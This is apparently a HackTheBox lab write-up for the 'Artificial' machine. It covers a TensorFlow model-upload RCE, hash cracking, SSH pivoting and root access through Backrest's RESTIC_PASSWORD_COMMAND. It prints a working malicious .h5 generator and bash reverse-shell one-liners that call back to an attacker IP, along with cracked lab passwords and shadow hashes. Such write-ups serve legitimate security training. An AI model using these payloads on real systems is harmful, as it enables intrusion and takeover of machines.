HTB-Artificial

eugewx2025-06-232025-08-31

Box Info

Difficulty	Easy
OS	Linux
IP Address	10.10.11.74

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.74 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.74 -sCV -Pn -sT -p 22,80
# Nmap scan vulnerability 
sudo nmap -sT -p 20,80 --script=vuln -O -Pn 10.10.11.74
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.74

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
|   256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_  256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Update DNS

1 2	sudo nano /etc/hosts 10.10.11.74 artificial.htb

Service Enumeration

80/tcp - HTTP

Once login it will shows a dashboard and allow us to upload

Check the requirements

Check the Dockerfile

Tensorflow RCE

TensorFlow Remote Code Execution with Malicious Model | CyberBlog

To make it work, we need to create the exploit.h5 file and import os and then execute with the revshell.

Then we need tensorflow:2.13.0 to run python script, here we will create a docker container to generate exploit.h5 file

Tensorflow Lambda RCE demo

PoC Tensorflow RCE

Prep the python environment

1
2
3

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

h5payload.py

import tensorflow as tf
import os

def exploit(x):
    import os
    os.system("rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.xx.xx 9001 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")

Then execute the docker to generate the .h5 payload

1 2	mkdir /app docker run -it --rm -v "$PWD":/app -w /app tensorflow/tensorflow:2.13.0 python3 generate_exploit.py

upload the exploit.h5 to the webpage and execute with view predictions

Start the listener before execute the script

Here we obtained APP user

Initiate User Foothold

Explore app user

Inside the app user app folder, there is an app.py script leaked the secret_key

app = Flask(__name__)
app.secret_key = "Sup3rS3cr3tKey4rtIfici4L"

app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///users.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['UPLOAD_FOLDER'] = 'models

users db file is located at ~/app/instance/

Download to local KALI and check all the user hashed password

Brute force password

1	john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt gael.hash

only GAEL and ROYER user hash are cracked. Validate with netexec

1	nxc ssh 10.10.11.74 -u user.txt -p pass.txt --continue-on-success

1	gael : mattp005numbertwo

Gael SSH

1	ssh gael@10.10.11.74

User Flag

Privilege Escalation

LinPEAS

sqlite

GROUP writeable file

Local listening port

9898/tcp - Backrest

Port forward to local KALI

1	ssh -L 9898:127.0.0.1:9898 gael@10.10.11.74

It is **Backrest 1.7.2 ,**tested with credentials we had now, but none of them able to login. Check again on the LinPEAS, there is a directory named backrest in /opt

inside the install.sh there is a config file to perform backup using restic

Upon checking the /var/backups fund a backrest_backup.tar.gz

Extract it out and check what can we get from this tar file

1	tar -xvf backrest_backup.tar.gz

Here it leaked the backrest_root credentials

backrest/.config/config.json

{
  "modno": 2,
  "version": 4,
  "instance": "Artificial",
  "auth": {
    "disabled": false,
    "users": [
      {
        "name": "backrest_root",
        "passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"
      }
    ]
  }
}

Brute force backrest_root Bcrypt

1	john --format=bcrypt -w /usr/share/wordlists/rockyou.txt backrest_root.hash^

1	backrest_root : !@#$%^

Initiate Root Foothold

Backrest Dashboard

Used the credentials found to login and it lead to the dashboard

https://github.com/garethgeorge/backrest

Getting Started

From adding restic repo inside Env Vars shows the requirement for the RESTIC_PASSWORD, and found there is an interesting Env is RESTIC_PASSWORD_COMMAND. Perhaps, I can abuse it with normal bash command

1	RESTIC_PASSWORD_COMMAND= bash -c ' bash -i >& /dev/tcp/10.10.xx.xx/9001 0>&1'

While pressing the test configuration, command works!

Root flag

Hashdump

1
2
3

root:$6$UUrrHE6LTPdhmLil$v9nJaHljuUC0gR5HBAqVWvnDVgYoNYE6EvjIEGNykwadZ8w8gOu212j5bipzK72.nBtx/0h4z4CPki/Ac2f1i1:20015:0:99999:7:::
gael:$6$ZgkOwXDgoK.yOfv9$7gGQcVFbMepHAPCW.qS/1z87V5p15x4RokWKwNvFXqwo3QLEfFx2GaJs1JqbZ81i/uLy7bJ8TYk4dQYXQpeEC0:20015:0:99999:7:::
app:$6$1CKnP41b8QhfYnAx$b88.zZJfVQ84SBkePAyzIsXdA/w6wvUVq4c2ExOho0RIY8iS43bdJbBPHYdttqqNvBV.H6noc2EFkdBlbb5WL.:20015:0:99999:7:::